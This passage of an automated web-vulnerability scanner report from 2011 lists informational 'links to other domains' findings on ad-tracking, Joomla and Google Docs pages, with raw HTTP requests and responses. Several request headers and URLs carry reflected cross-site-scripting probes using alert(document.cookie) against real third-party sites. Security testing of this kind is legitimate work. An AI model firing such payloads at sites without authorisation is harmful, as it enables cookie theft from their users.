http://ib.adnxs.com/seg?add=65890&t=2
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395
http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770
http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221
http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhaWoU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/


<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1975009456" width="1" height="1" border="0"/>

<img src='http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage' width='1' height='1' border='0'>

<img src="http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200" width="1" height="1" border="0">

<img src="http://action.mathtag.com/mm//RSHA//red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n" width="1" height="1" />
<img src="http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0"/>
<img src="http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221" height="1" width="1" />
<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">

...[SNIP]...

<img width="1" height="1" src="http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47" />

...[SNIP]...

<img src="http://ib.adnxs.com/seg?add=65890&t=2" width="1" height="1" />

...[SNIP]...

<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3">

<img src="http://ad.yieldmanager.com/pixel?id=1082184&t=2" width="1" height="1" />

...[SNIP]...

<img src="http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770"style="visibility:hidden;width:1px;height:1px;">

20.33. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The page was loaded from a URL containing a query string:

http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120

The response contains the following links to other domains:

http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage
http://action.mathtag.com/mm/RSHA/red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n
http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47
http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?
http://ad.yieldmanager.com/pixel?id=1082184&t=2
http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2
http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1596989115
http://ib.adnxs.com/seg?add=65890&t=2
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395
http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770
http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221
http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/


<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1596989115" width="1" height="1" border="0"/>

<img src='http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage' width='1' height='1' border='0'>

<img src="http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200" width="1" height="1" border="0">

<img src="http://action.mathtag.com/mm//RSHA//red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n" width="1" height="1" />
<img src="http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0"/>
<img src="http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221" height="1" width="1" />
<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">

...[SNIP]...

<img width="1" height="1" src="http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47" />

...[SNIP]...

<img src="http://ib.adnxs.com/seg?add=65890&t=2" width="1" height="1" />

...[SNIP]...

<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3">

<img src="http://ad.yieldmanager.com/pixel?id=1082184&t=2" width="1" height="1" />

...[SNIP]...

<img src="http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770"style="visibility:hidden;width:1px;height:1px;">

20.34. http://docs.google.com/viewer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.google.com
Path:	/viewer

Issue detail

The page was loaded from a URL containing a query string:

http://docs.google.com/viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo

The response contains the following links to other domains:

http://ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif
http://www.youtube.com/?tab=o1

Request

GET /viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo HTTP/1.1
Host: docs.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 15:05:17 GMT
Expires: Mon, 24 Jan 2011 15:05:17 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=5">
<script type="text/javascript">
(fun
...[SNIP]...
</a> <a target=_blank href="http://www.youtube.com/?tab=o1" class=gb2>YouTube</a>
...[SNIP]...
<a title="Back to Google Docs" href="//docs.google.com/"><img border="0" id="docs-logo" src="//ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif" width="122" alt="Google Docs logo"></a>
...[SNIP]...

20.35. http://docs.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://docs.joomla.org/index.php?title=Special:UserLogin&type=signup&returnto=Main_Page

The response contains the following links to other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.mediawiki.org/

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" />
...[SNIP]...

20.36. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02?

The response contains the following link to another domain:

http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?

Request

GET /activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 24 Jan 2011 21:06:42 GMT
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/javascript" src="http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?"></script>
...[SNIP]...

20.37. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418?

The response contains the following link to another domain:

http://adserver.adtechus.com/bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123

Request

GET /activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 25 Jan 2011 02:19:48 GMT
Expires: Tue, 25 Jan 2011 02:19:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 346

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://adserver.adtechus.com/bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123" width="1" height"1"></body>
...[SNIP]...

20.38. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=2796071618795.395?

The response contains the following link to another domain:

http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=EF49DD91943288556B07EA9CA12529D8&rsi_site=3BA6B57E2462874C6ECE9A88A9EFB9F7&rsi_event=4124D1F49399B97ABFE4F69108069695

Request

GET /activityi;src=1890937;type=leadq962;cat=autoc435;ord=2796071618795.395? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 25 Jan 2011 02:18:43 GMT
Expires: Tue, 25 Jan 2011 02:18:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 918

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=EF49DD91943288556B07EA9CA12529D8&rsi_site=3BA6B57E2462874C6ECE9A88A9EFB9F7&rsi_event=4124D1F49399B97ABFE4F69108069695"/></body>
...[SNIP]...

20.39. http://forum.joomla.org/ucp.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/ucp.php

Issue detail

The page was loaded from a URL containing a query string:

http://forum.joomla.org/ucp.php?mode=register

The response contains the following links to other domains:

http://kontentdesign.com/
http://opensource.org/licenses/gpl-license.php
http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
http://www.opensourcematters.org/
http://www.phpbb.com/
http://www.rochenhost.com/joomla-hosting

Request

GET /ucp.php?mode=register HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=937f6ec303cabbfe9c8df22a65214623; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en"></script>
...[SNIP]...
red by phpBB (hereinafter ...they..., ...them..., ...their..., ...phpBB software..., ...www.phpbb.com..., ...phpBB Group..., ...phpBB Teams...) which is a bulletin board solution released under the ...<a href="http://opensource.org/licenses/gpl-license.php">General Public License</a>... (hereinafter ...GPL...) and can be downloaded from <a href="http://www.phpbb.com/">www.phpbb.com</a>
...[SNIP]...
ly facilitates internet based discussions, the phpBB Group are not responsible for what we allow and/or disallow as permissible content and/or conduct. For further information about phpBB, please see: <a href="http://www.phpbb.com/">http://www.phpbb.com/</a>
...[SNIP]...
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_blank" >phpBB</a>
...[SNIP]...
<div id="footerInfo">© 2005-2010 <a target="_blank" href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved.
           <a target="_blank" title="Joomla Hosting" href="http://www.rochenhost.com/joomla-hosting">Joomla hosting</a> by Rochen Ltd.>   

           <a href="http://kontentdesign.com" target="_blank">Design by Kontent Design</a>
...[SNIP]...

20.40. http://forum.joomla.org/viewforum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewforum.php

Issue detail

The page was loaded from a URL containing a query string:

http://forum.joomla.org/viewforum.php?f=511

The response contains the following links to other domains:

http://kontentdesign.com/
http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
http://www.opensourcematters.org/
http://www.phpbb.com/
http://www.rochenhost.com/joomla-hosting

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.41. http://forum.joomla.org/viewtopic.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewtopic.php

Issue detail

The page was loaded from a URL containing a query string:

http://forum.joomla.org/viewtopic.php?f=8&t=65

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Bump_(Internet)
http://en.wikipedia.org/wiki/Flame_war
http://en.wikipedia.org/wiki/Internet_troll
http://en.wikipedia.org/wiki/Spamming
http://kontentdesign.com/
http://partner.googleadservices.com/gampad/google_service.js
http://www.catb.org/~esr/faqs/smart-questions.html
http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
http://www.joomlatutorials.com/
http://www.opensourcematters.org/
http://www.phpbb.com/
http://www.rochen.com/
http://www.rochenhost.com/joomla-hosting

Request

GET /viewtopic.php?f=8&t=65 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=ae17e90373187b87758c2dacc0119086; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en"></script>
...[SNIP]...
<li>Ask Questions The Smart Way. Read <a href="http://www.catb.org/~esr/faqs/smart-questions.html" class="postlink">this</a>
...[SNIP]...
<li>No useless posts. This includes: <a href="http://en.wikipedia.org/wiki/Bump_(Internet)" class="postlink">Thread bumping</a>, useless one liners, <a href="http://en.wikipedia.org/wiki/Flame_war" class="postlink">Flamewars</a>, <a href="http://en.wikipedia.org/wiki/Internet_troll" class="postlink">Trolling</a> and <a href="http://en.wikipedia.org/wiki/Spamming#Newsgroup_spam_and_Forum_spam" class="postlink">Spamming</a>. What is spamming? Read <a href="http://en.wikipedia.org/wiki/Spamming#Newsgroup_spam_and_Forum_spam" class="postlink">this.</a>
...[SNIP]...
<a class="postlink" href="http://www.rochen.com">http://www.rochen.com</a>
...[SNIP]...
<a class="postlink" href="http://www.joomlatutorials.com">http://www.joomlatutorials.com</a>
...[SNIP]...
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_blank" >phpBB</a>
...[SNIP]...
<div id="footerInfo">© 2005-2010 <a target="_blank" href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved.
           <a target="_blank" title="Joomla Hosting" href="http://www.rochenhost.com/joomla-hosting">Joomla hosting</a> by Rochen Ltd.>   

           <a href="http://kontentdesign.com" target="_blank">Design by Kontent Design</a>
...[SNIP]...

20.42. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938548&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295916947994&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295916948025&frm=0&adk=1607234649&ga_vid=208581788.1295916948&ga_sid=1295916948&ga_hid=373713928&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=120&xpc=bWxP3p2ZTF&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&usg=AFQjCNGnq40lsgyTq_7lqqTYJvargBixNw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938548&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295916947994&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295916948025&frm=0&adk=1607234649&ga_vid=208581788.1295916948&ga_sid=1295916948&ga_hid=373713928&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=120&xpc=bWxP3p2ZTF&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.43. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3Dwww.google.com/webdesigner%26adT%3DAre%2BYou%2BA%2BWeb%2BDesigner%253F%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.elance.com/Javascript%26adT%3DJavascript%2Bprogrammer%26adU%3Dwww.SeeWhy.com/%26adT%3DShopping%2BCart%2BAbandons%26gl%3DUS&usg=AFQjCNEoZD3S-6NohErZ7QpCcI2ZGdeADA

Request

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
